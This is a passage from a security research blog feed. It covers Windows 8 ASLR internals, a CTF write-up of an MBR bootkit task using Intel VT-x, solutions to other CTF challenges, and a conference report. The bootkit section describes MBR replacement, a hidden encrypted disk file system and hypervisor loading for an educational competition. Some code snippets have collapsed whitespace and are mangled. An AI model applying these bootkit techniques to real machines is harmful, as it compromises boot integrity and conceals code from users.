    RelocDelta = pSeg->BasedAddress - a1->SelectedBase;if(RelocDelta > MmHighsetUserAddress){return0;}if((RelocationSizein64k <<0x10)>  MmHighsetUserAddress){return0;}if(RelocDelta +(RelocationSizein64k <<0x10)<= RelocDelta){return0;}if(RelocDelta +(RelocationSizein64k <<0x10)> MmHighsetUserAddress){return0;}if(a1->SelectedBase + RandomVal ==0){
        Result = pSeg->BasedAddress;}else{if(RelocDelta > RandomVal){
            Result = RelocDelta - RandomVal;}else{
            Result = RelocDelta + RandomVal;if(Result < RelocDelta){return0;}if(((RelocationSizein64k <<0x10)+ RelocDelta + RandomVal)>0x7FFFFFDFFFF){return0;}if(((RelocationSizein64k <<0x10)+ RelocDelta + RandomVal)<(RelocDelta +(RelocationSizein64k <<0x10)))){return0;}}}//random_epilog
    a1->RelocStartBit =0xFFFFFFFF;
    a1->RelocationSizein64k = RelocationSizein64k;
    pSeg->ControlArea->ImageRelocationStartBit =0xFFFFFFFF;
    pSeg->ControlArea->ImageRelocationSizeIn64k = RelocationSizein64k;return Result;}
As we can see, there are three different image bitmaps. The first one is for 32-bit executables, the second is for x64, and the third is for x64 with the image base above 4GB, which grants them a high-entropy virtual address.

The executables are randomized by a direct modification of the image base. As for the DLLs, ASLR is a part of relocation, and the random part of the image base selection process is ImageBias. It is a value that is initialized during the system startup.
VOID MiInitializeRelocations(){
    MiImageBias = ExGenRandom(1)%256;
    MiImageBias64Low = ExGenRandom(1)% MiImageBitMap64Low.SizeOfBitMap;
    MiImageBias64High = ExGenRandom(1)% MiImageBitMap64High.SizeOfBitMap;return;}
Image bitmaps represent the address space of the running user processes. Once an executable image is loaded, it will have the same address for all the processes that reference it. It is natural because of efficiency and memory usage optimization, since executables use the copy-on-write mechanism.
ASLR implemented on Windows 8 can now force images, which are not ASLR aware, to be loaded at a random virtual address. The table below demonstrates the loader’s behavior with different combinations of ASLR-relevant linker flags.


*Cannot be built with MSVS because the /DYNAMICBASE option also implies /FIXED:NO, which generates a relocation section in an executable.

We can spot that the loader’s behavior changed in Windows 8 — if a relocation section is available in the PE file, it will be loaded anyway. It also proves that ASLR and the relocation mechanism are really interconnected.

Generally we can say that implementation of the new ASLR features on Windows 8 doesn’t much influence the code logic, that is why it is difficult to find any profitable vulnerabilities in it. Entropy increase for randomizing various objects is in fact a substitution of a constant expression in a code. The code graphs also show that the code review has been done.

References:

[1] Chris Valasek, Tarjei Mandt. Windows 8 Heap Internals. 2012.
[2] Ken Johnson, Matt Miller. Exploit Mitigation Improvements in Windows 8. Slides, Black Hat USA 2012.
[3] Intel. Intel®Digital Random Number Generator (DRNG): Software Implementation Guide. Intel Corporation, 2012.
[4] Ollie Whitehouse. An Analysis of Address Space Layout Randomization on Windows Vista. Symantec Advances Threat Research, 2007.
[5] Alexander Sotirov, Mark Dowd. Bypassing Browser Memory Protections. 2008.

PHDays CTF Quals – BINARY 500 or Hiding Flag Six Feet Under (MBR Bootkit + Intel VT-x)

$
0
0
PHDays CTF Quals took place on December 15-17, 2012. More than 300 teams participated in this event and fought to become a part of PHDays III CTF, which is going to be held in May 2013. Our team had been developing the tasks for this competition for two months. And this article is devoted to the secrets of one of them – Binary 500. This task is very unusual and hard-to-solve, so nobody could find its flag.

This executable file is an MBR bootkit, which uses hardware virtualization (Intel VT-x). Due to the program’s specific features, we decided to warn users that this program should be executed on a virtual machine or an emulator only.


 Warning and license agreement

Dropper

Let’s start with the dropper overview. The main goal of this module is very simple. It is to write files extracted from a resource section into a self-made hidden file system and replace original MBR with a self-made one. It also saves original MBR in the file system. There are few things, which complicate the dropper analysis. First of all, it is written in C++ using STL, OOP, and virtual functions. That’s why all the calls are indirect.



 Virtual function calls in IDA Pro

Secondly, all the disk operations are carried out via the SCSI controller. Instead of the usual ReadFile/WriteFile functions, we use DeviceIoControl with the control code SCSI_PASS_THROUGH_DIRECT, which allows us to communicate with the hard drive on a lower level.

All the files from the resources are encrypted using RC4 and a 256-bit key.

The next thing is the hidden file system. Its structure is pretty simple. The system grows from the end and is written two sectors before the end of the hard drive. First DWORD is a number of files XORed with constant 0x8FC54ED2. Then a directory with information about the files goes:
struct MiniFsFileEntry{DWORD fileIndex;DWORD fileOffset;DWORD fileSize;};
The file index is just a constant related to a specific file. Offset is counted in bytes relative to the file system start.

 MiniFs file system structure

MBR

After the dropper ends its operation, it becomes obvious that we have nothing left to do with the operating system and just need to reboot and start debugging the master boot record. There are several ways to debug MBR. There’s no doubt we can analyse it on a real machine using a hardware debugger, but it’s inconvenient and expensive. That is why we recommend to use the VMWare virtual machine (you need to configure an image configuration file at first) connecting to it with the help of the GDB debugger (this method has significant drawbacks, which will be described later) or the Bochs emulator. The main advantage of these methods is that you can use the IDA Pro debugger for analysis and it’s very convenient!

Having chosen our instruments, we are able to get started. The first part of MBR is really simple, and there shouldn’t be any problems with its analysis. It only reads the second part of our MBR (Extended MBR) from the hard drive and writes it to the memory at address 0x7e00 (right after the first part). This operation is important because BIOS maps just the first 512 bytes of MBR and our code exceeds this size.

Analyzing extended MBR, a good specialist will immediately understand that something is wrong, namely that the loader is obfuscated.


Comparison of MBR source code with the IDA Pro analysis

Obfuscation is complicated mainly by indirect function calls. At the very beginning AX registers the address of a function, which scans a specific table (containing function indexes and related offsets) to get the offset of a function to be called. After the function is fulfilled, the control is returned right after the function index constant (return address + 2).


Function table in MBR
MBR obfuscation algorithm

MBR code is pretty simple:

  1. Retrieves hard drive features.
  2. Reads original MBR from the hidden file system.
  3. Replaces our MBR with original MBR at the 0x7c00 address.
  4. Reads and decrypts a hypervisor loader from the file system.
  5. Reads and decrypts a hypervisor body from the file system.
  6. Prepares parameters and passes control to the hypervisor loader.

It should be mentioned that a set of bytes of Bochs BIOS was used for encryption of the hypervisor loader and body. It makes the program system-specific, because it runs correctly only on the Bochs emulator. We decided to use this method for several reasons. Firstly, debugging of Intel VT-x hardware virtualization is possible only on a real machine or using Bochs 2.4.5 or later (so we are already tied to this emulator). Secondly, we didn't want the participants to find encryption keys in the program and decrypt all the hypervisor parts using the static analysis without the debugger. Thirdly, this method prevents users from damaging systems on real machines.

To help the participants, we had published information that they would need Bochs emulator with a working OS image to solve one of the tasks in advance.

VMX Loader

Hardware virtualization is not a new term. It started to spread in 2006 – 2007 when the most well-known CPU developers (Intel and AMD) released processors, which could support related instruction sets. Details on the virtual machine monitor will be provided in the next section. This section will touch upon the methods how to prepare the system for the hardware hypervisor.

As it was mentioned above, it is possible to debug an application, which uses Intel VT-x virtualization, only on real machine or using Bochs 2.4.5 or above, but it is not the only problem. The default emulator build does not support hardware virtualization. That is why we had to compile our own build of Bochs and provide a link to it in the first hint to the task.

The main goal of the hypervisor loader is to move the hypervisor’s body above the first megabyte and transfer control to its entry point. However, it carries out some non-trivial operations, which will be covered below.

There are several input parameters including a base address, which is used as a code segment base. It is set by a far jump.

Then the CPUID instruction checks that code is executed on the Intel system (zero function) and that hardware virtualization is supported by the processor (first function). Let’s take a closer look. Firstly, we call CPUID with value 1 in the EAX register. After the execution, the fifth bit of the ECX register (VMX flag) should be checked. If it is set, then hardware virtualization is supported. To check if virtualization is blocked on the early boot stages (BIOS), we need to read 0x3A MSR register. If the first bit of the EAX register is set after RDMSR instruction execution and the second bit is clear then virtualization is blocked.

Then the loader calls a function, which reads the system memory map. This is achieved by calling interrupt 0x15 in the cycle with the 0xE820 value in the EAX register. That’s how the buffer is filled with records of memory regions. Then the memory map is checked for a free area suitable for the monitor body. If such a memory is found, it is marked as reserved.

To move monitor body above the first megabyte, we need to switch the processor from a real mode to a protected or long mode. We decided to switch directly to the long mode as the hypervisor body works in it. We need to satisfy several conditions: prepare paging structures (PML4, PDPT, a number of PDs for 2MB pages), set PAE bit in the CR4 register, load the PML4 address to the CR3 register, set up GDTR with the long-mode segment registers, set the LMA bit in the MSR EFER register and set the PG and PE bits in the CR0 register. After these operations, we should make a far jump to switch the processor to the long mode.

We noticed at this moment that the IDA Pro 6.1 debugger has a bug, which prevents it from calculating a correct far address, and it shows users some garbage data (this bug is fixed in IDA 6.3). It seems that IDA does not use register values from the Bochs debugger and makes wrong calculations by itself. That is why we recommended the participants to use the built-in Bochs debugger.

The last step is to copy the body to the destination address and transfer control to the entry point.

VMX Hypervisor

Specifically for this task we wrote a thin hypervisor, which:

  • Enters the VMX-root mode.
  • Sets the VMCS structure to start the guest system in the real mode starting from the 0x7c00 address.
  • Sets up guest exit handlers.
  • Starts a guest by executing the VMLAUNCH instruction.

The main goal of a participant is to find a guest system exit handler and analyze its code.

Flag

Obtaining the virtual machine exit handler, a participant came to the final stretch, and only a small task was needed to be solved.

It is obvious from handler's code that if  the CPUID instruction causes an exit and the EIP register contains a specific value then the handler creates an array (32 bytes) from the values of the registers EAX, ECX, EDX, EBX, ESI, EDI, ESP, EBP and then this array is checked for validity. The handler inserts vector (x_0,…,x_31 ) to the set of equations of the following type:
If the equality is satisfied then the vector is valid and used as a key for buffer decryption. Therefore, a participant needs to solve a set of 32 equations with 32 variables. The only thing that complicates the analysis is that the validation algorithm uses a floating point unit (FPU) instruction set.

There is one more (final) MBR in the encrypted buffer which contains a plaintext flag. This bootstrap substitutes the original MBR, and its goal is to display the flag on the screen.


Example of a displayed flag

Test application

Specifically for testing, we have developed an application, which allocates memory to a given address, writes CPUID and a few other instructions with regard to a specific offset (address + offset = the needed EIP value), sets up registers and passes control to the given address. Therefore, when the CPUID instruction is carried out, the hypervisor takes control over, checks the register values, and reboots the system displaying the flag on the screen.


Example of a test application

Conclusion

Developing this application, we wanted to create something unusual, a program which would be interesting for the whole team, because to solve this task, the participants needed to have skills in Win32 reverse engineering, analysis of MBR executed in the real mode, encryption and obfuscation algorithms analysis. This task required both static and dynamic analyses. The participants needed to have basic knowledge of hardware virtualization and assembler x86-64; to use their mathematical skills to obtain the flag.

We really hope that we managed to interest both the participants and the readers of this review!

From the authors

We decided to write this task three weeks before the start of the qualifications and were absolutely sure that would finish very soon, but our expectations were not met. We had finished the task just a few hours before PHDays CTF Quals started and did not have any time to test it or fix the bugs. We were only sure that it was possible to obtain the flag, but the operating system ran not so well in the virtual environment. It displayed blue screens of death from time to time and didn't want to boot after resetting the system. While writing this article, we had some time to fix the bugs and release a more stable task. Unfortunately, this time was not enough either to regulate the operating system. Follow the links to download the last version of the task and watch the video demonstrating the task and test application operation.

Thanks to everybody!

Task Archive

Max Grigoryev, Sergey Kovalev, Positive Research 

Labyrinth, Noise Elimination, Circuit Engineering... Review of the Most Interesting Tasks of PHDays CTF Quals

$
0
0
PHDays CTF Quals, information security competition, ended last week. 493 teams from 30 countries competed in information hacking and protection. All the tasks were divided into five categories from Reverse Engineering to the tasks typical of the real world (the details and results of the competition are available in our previous post). Each category included five tasks of different challenge levels (from 100 to 500 points).

The majority of the tasks were solved by the teams, some of them caused troubles, and some were left unsolved. Moreover, for a part of the tasks the teams used such solutions, which were not even considered by the organizers. This time we want to review the most interesting (in our opinion) and difficult tasks of PHDays CTF Quals.

Misc 400

An interactive service offered the participants to find a path in a 3D labyrinth (a cube (50х50) with multiple corridors inside).

Each time a team went through a labyrinth, another appeared, and thus 16 times in total. A hint was given in the middle of the task: "A point of view does matter". If viewing in one of the three projections, then a path in each of the labyrinths is a character of the answer.

Therefore, 16 labyrinths give us 16 characters of the flag: NOF3ARNO3XITHER3.
When the last labyrinth was solved, the service popped up a message with the following text: You win! How do you like the flag? ;) And closed the connection. Such an unexpected end of the task caused cognitive dissonance in many participants. :)

Follow the link to view the path projections.

Github code.

Bin300 (HashME) – Hash with Modular Exponent

A binary file of 754 bytes was provided.

The task was formulated as follows: "Find the valid password, and you will find the cherished flag".
 The file included the following strings: Bad pwd, hex, sys, hashlib, argv, isalnum, len, Exception, chr, pow, int, encode, md5, hexdigest, <module>.

Judging by the strings, it is easy to guess that the file contains Python byte-code, which is also proved by the GNU file python 2.7 byte-compiled.

There is a decompiler named uncompyle for Python 2.7.

Set up tuj, launch, and receive a decompiled text:
importsys, hashlib(5, 1, 3, 6,) = (10018627425667944010192184374616954034932336288972070602267764174849233338727414964592990350312034463496546535924460513481267263055398790908691402854122123L, 7548218116432136940925610514648634474612691039131890951895054656437277296127635726026902728136306678987800886118938655787775411887815467753774352743068577L, 6192128262312421513644888506697421915171917575080330421897398651929773466194971539791158995262083381167771056580666419101167108372547406447696753234781064L, sys.argv[-1])ifnot 6.isalnum()orlen(6)>10: raiseException('Bad pwd')0 = (chr(len(6)) + 6)*322 = pow(1, int(0[:64].encode('hex'), 16), 5)if3!= 2: printhex(2)else: print hashlib.md5(6).hexdigest()
It is evident, that something is wrong with the code — it cannot be compiled. The reason is very simple — variable names were substituted by simple numbers in the compiled file. It hardly prevents byte-code execution, but decompiling makes variable names begin with numbers, and the parser considers it as an error.

It is only needed to insert any letter before each simple number to fix it or to use the first hint:
Python 2.7, "pgxweh"<=>"513602"
Proper functioning code should look as follows:
importsys, hashlib(p, g, x, w,) = (10018627425667944010192184374616954034932336288972070602267764174849233338727414964592990350312034463496546535924460513481267263055398790908691402854122123L,
7548218116432136940925610514648634474612691039131890951895054656437277296127635726026902728136306678987800886118938655787775411887815467753774352743068577L,
6192128262312421513644888506697421915171917575080330421897398651929773466194971539791158995262083381167771056580666419101167108372547406447696753234781064L, sys.argv[-1])ifnot w.isalnum()orlen(w)>10: raiseException('Bad pwd')
e = (chr(len(w)) + w)*32
h = pow(g, int(e[:64].encode('hex'), 16), p)if x != h: printhex(h)else: print hashlib.md5(w).hexdigest()
The code makes it clear that if to specify the correct password as the last argument of the command string, a hexadecimal MD5 value of this password (flag) will be displayed. The password consists only of letters and numbers, its length is from 1 to 10 characters inclusive.

The password is converted to a Pascal string (length byte + data), which is repeated to obtain 64 bytes. These 64 bytes are interpreted as a long integer, which becomes exponent е. The password is deemed to be right if pow(g,e,p)==x

The values p, g, and x are known, p is a simple number, g is a multiplicative group generator, e is to be found. This is the discrete logarithm problem. 48 hours are not enough for the 512-bit p (as far as we know ;). However, there is a chance to brute force the password.

A possible character set is 0-9A-Za-z. That is 62 variants. The maximum length is 10, thus the total number of possible passwords is: 

62^1 + 62^2 + 62^3 + ... + 62^10 == 853058371866181866 ≈ 2^59.6

Calculation of a 512-bit modular exponent is carried out quite slowly, and it is hardly possible to brute force even 228 variants using only one computer for 48 hours.

However, it is not necessary to calculate a modular exponent for each password, and the second hint makes it clear:

g^(a+b) == g^a * g^b

Suppose we brute force passwords of 3 characters. Then the exponent will look as follows in a hexadecimal record:

е = 03 XX YY ZZ 03 XX YY ZZ 03 XX YY ZZ … 03 XX YY ZZ

where XX, YY, and ZZ are password characters.

Taking into account the hint, the exponent can be written as 4 numbers:

e0 = 03 00 00 00 03 00 00 00 03 00 00 00 … 03 00 00 00
e1 = 00 XX 00 00 00 XX 00 00 00 XX 00 00 … 00 XX 00 00
e2 = 00 00 YY 00 00 00 YY 00 00 00 YY 00 … 00 00 YY 00
e3 = 00 00 00 ZZ 00 00 00 ZZ 00 00 00 ZZ … 00 00 00 ZZ

And then
pow(g,e,p) == (pow(g,e0,p) * pow(g,e1,p) * pow(g,e2,p) * pow(g,e3,p)) % p

It is remarkable that for passwords with a fixed length the value is e0, and thus pow(g,e0,p) will be unchanged. And pow(g,e[i],p) can take only one of 62 possible values, which can be calculated only once. Changing only one password character, only one multiplier will be changed. Modular exponentiation can be brought to modular multiplication to increase speed by more than 500 times.

However, even when all this is done, it's still hardly possible to brute force 2^60 variants within 48 hours. This time the third hint can help:

Meet In The Middle

The thing is that modular multiplication is a reversible operation (at least in this case). Using the extended Euclidean algorithm, it is possible to calculate g-1==g’, algebraic supplement g modulo p, so that (g*g’)%p==1

Then if
(pow(g,e0,p) * pow(g,e1,p) * pow(g,e2,p) * pow(g,e3,p)) % p == x

then the following equation will be true:  

(pow(g,e2,p) * pow(g,e3,p)) % p == (x * pow(g’,e0,p) * pow(g’,e1,p)) % p

It allows us to "meet in the middle".

Mentally divide the password length into two parts as close to the middle as possible. Brute force all the variants of a shorter part and multiply x by each of the values pow(g’,e[i],p) consecutively. Save the results in a table.

Brute force all the variants of the other part and multiply 1 by each of the values pow(g,e[i],p) consecutively. You can multiply modulo p. Find the result in the table. In case of matching values, you only need to remember the value of the short password part, which generated this table element.

Due to the fact that the password length is not more than 10 characters, then a half of the password will not be longer than 5 characters and 62^5 == 916132832 ≈ 2^29.8. So the task can be solved by doing less than 2^31 modular multiplications, which is possible even if only one machine is used. Though to store 2^29.8 512-bit values, almost 55 GB of memory will be needed.

However, firstly, you can save less than 512 bit (40 bit should be enough so that the collision number would be close to zero). And secondly, the correct password contained only 9 characters, and already 2 GB of RAM are enough for 62^4 variants.

It can be guaranteed that, if correctly used, a single-threaded Python program installed on a computer, which CPU is Core-i5 3.1GHz, will find any password with length up to 8 characters inclusive approximately in 4 minutes and any 9-character password in an hour and a half.

Binary – 400 (BoobFs)

This task is very interesting, but no team managed to solve it.
Input data:
  1. BMP image (file system image).
  2. A software to create a file system image out of files.

    File system image as a picture

    The file system consists of a main header, one directory including a variable file amount and divided into several blocks of variable length. Each file is also divided into blocks of variable length. The blocks are encrypted by the RC4 algorithm on a user key. A directory contains a file name, its size, and the size and offset of the first file's block. Each block contains the offset and size of the next block. The file system grows from the end.
    struct FS_HEADER{
     DWORD signature;// BOOB
     DWORD dirOffset;
     DWORD firstBlockSize;}; struct DIR_BLOCK_HEADER{
     BYTE  signature;// D
     DWORD nextBlockOffset;
     DWORD nextBlockSize;
     DWORD numberOfFiles;}; struct FILE_ENTRY{
     CHAR  fileName[MAX_FNAME];// MAX_FNAME = 20
     DWORD fileSizeInBytes;
     DWORD firstBlockOffset;
     DWORD firstBlockSize;}; struct FILE_BLOCK_HEADER{
     BYTE  signature;// F
     DWORD nextBlockOffset;
     DWORD nextBlockSize;}; 
    An example of a file system structure (S is the number of blocks in a directory, Ni is the number of files in the i block, P is the total blocks number, equaling to N0 + … + NS)

    When the file system is created, all the data is modified (Base64 modification) and recorded to a two-dimensional array by a special formula, and all the spare space is filled with pseudorandom numbers, and a BMP file is created on the basis of this array.

    The function used for recording data to the array

    The program is written in C++ using STL, OOP, and virtual functions. It makes this application analysis more complicated.

    The task can be solved in several stages:
    1. Read the file data into a two-dimensional array (to eliminate redundancy of the BMP format).
    2. Work out the formula, which will be used to read the data from the two-dimensional array.
    3. Work out the method used for data conversion and invert the algorithm (modified Base64).
    4. Brute force the file system PIN.
    5. Work out the file system structure, write a program to bypass it, and extract all the files (16 in total).
    6. Compose a sentence from the file names, which will help to receive the flag.

      Forensics500

      The participants were provided with network traffic dump in a pcap file containing the flag.

      Port 554/udp indicated that it was the RTP stream. And more likely an audio stream.


      Task opened with Wireshark

      Trying to listen to the audio, it becomes evident that music is played against some noise and sometimes more noisy fragments appear. In fact the stream consists of two streams. The RTP specification describes 1 bit used on the application level and defined by the profile. If this field is set up, then the packet data has a specific feature, by which the traffic can be divided into two streams. Now one of them plays the music, and noises and something like a voice can be heard from the other one. This is the final part of the task. It is necessary to understand noises' nature and eliminate them. We should say that the noise is XOR of the audio data with 0xCC byte.

      There are several ways for further task solution. Here is one of them.

      Less noisy parts are more likely silence and noise. Knowing the codec (see the dump), generate your own audio file with silence. Analyzing the stream and your file, it is possible to work out the nature and type of the noise.

      XThe XOR key can be guessed. In this case the final part of the task related to the audio effect is very similar to analog radio tuning. The closer to the correct value, the purer the sound.

      As a result, when the noise was eliminated, a woman voice spelled the flag in English.

      During the competition the participants were provided with the following hints implying the main solution stages:

      Listen... the strange noise
      Simple noise over alphabet
      a?x=b b?x=a x?????

      PPP solved the task after the third hint, and some of the participants were very close to solution. Using their own methods for noise elimination, they achieved good results having mistaken by 1 or 2 characters.


      Misc500

      The participants were provided with a binary file for Electronics Workbench — active project, which can be started and debugged. 


      Scheme appearance

      The scheme is obfuscated and consists of two parts. The first part includes elements necessary to display the message PHD3 on the indicators. The second (independent) part is an aggregate of 32 binary/decimal/binary-decimal counters, conversion rate of which is a flag character. The hint “Follow the counters” helped to pay attention to the counters. The flag length in the MD5 format is 32 characters in the HEX format, conversion rates of the counters fall in the range [2;15]. A wire with pointers not connected to anything gave a hint to the order of the flag characters.

      The team ufologists tried to submit MD5 differing in a couple of characters from the correct flag 10 minutes prior to the end of PHDays CTF Quals. However, unfortunately, they came short of time for the bug elimination.

      No team could solve the task in the end.

      Forensic400

      The teams were provided with a 512x512-pixel image in the PNG format.  


      Task for Forensic 400

      Analyzing the image with any graphics editor, it can be noticed that the image is not of three colors — white and red colors are not homogeneous. The first hint (Not all white pixels are the same white :)) was about this fact. Blackening exposes pixels of almost white and almost red colors.


      Blackening result

      It is obvious that the pixels are orderly allocated. It is difficult to understand/remember/guess what this order is, that is why the second and the most important hint was made (a,b,c,d,e,f,g,h <-> a,e,c,g,b,f,d,h), which was an example of the bit-reversal permutation. To apply this permutation, it is necessary to ensure that the original sequence equals to the power of two. The image size complies with this condition.

      Then it was necessary to convert in one's head write a utility, which would implement permutation described above, and receive the following image at the end:



      Permutation result

      Brackets are clearly seen. It means the previous step was correct! However, the text is superimposed. Removing an image part and applying the permutation, we receive a part of the flag:



      Obtaining the flag part

      Then we only need to find out which parts to remove and obtain other parts of the flag.




      Obtaining the other flag parts

      The task was solved by two teams. The first was Magic-Hat (RU), then Plaid Parliament of Pwning (US). It is only fair to say that bit-reversal permutation was described on the Russian-language resource habrahabr.ru a few months ago, so the results of the team PPP deserve respect!

      We published a detailed review of the task BINARY 500, which wasn't solved by any team, in our blog a few days ago.

      You can review the participants' reports to know how they coped with the tasks:

      Positive Technologies Experts Took Part in Chaos Communication Congress in Hamburg

      $
      0
      0
      Chaos Communication Congress organized by Chaos Computer Club is one of the oldest (since 1984) and largest events of the hacker world in Europe. The latest twenty ninth in succession meeting (29С3 as called by the organizers) brought together 6,000 participants including representatives of our company — Sergey Gordeychik, Gleb Gritsay, and Yury Goltsev.

      The Congress scenario included multiple reports and workshops focused on various information security aspects.

      Sergey Gordeychik and Gleb Gritsay reported on the results of the security research of the largest ICS systems.


      By the way, this presentation was partially shown at the Power of Community (PoC) conference held in Seoul.

      The audience was very interested in the report (both the visitors and online audience), and, by popular request, the team of Positive Technologies joined the workshop of Maryna Krotofil, a doctoral candidate at Hamburg University of Technology, which was dedicated to ICS systems security.


      In the end the workshop took two hours instead of an hour as had been planned by the organizers; and various vulnerabilities of programmable logic controllers were demonstrated.


      However, it was not the only workshop, in which the representatives of Positive Technologies took part — Yury Goltsev held a competition and workshop named $natch, developed on the ground of Internet Banking contests firstly held as part of the forum Positive Hack Days 2012. Moreover, our team reviewed the forum PHDays III in the course of Lightning Talks.

      Congress Wiki page: https://events.ccc.de/congress/2012/wiki/Main_Page
      Congress weblog: http://events.ccc.de/category/29c3/

      Viewing all 198 articles
      Browse latest View live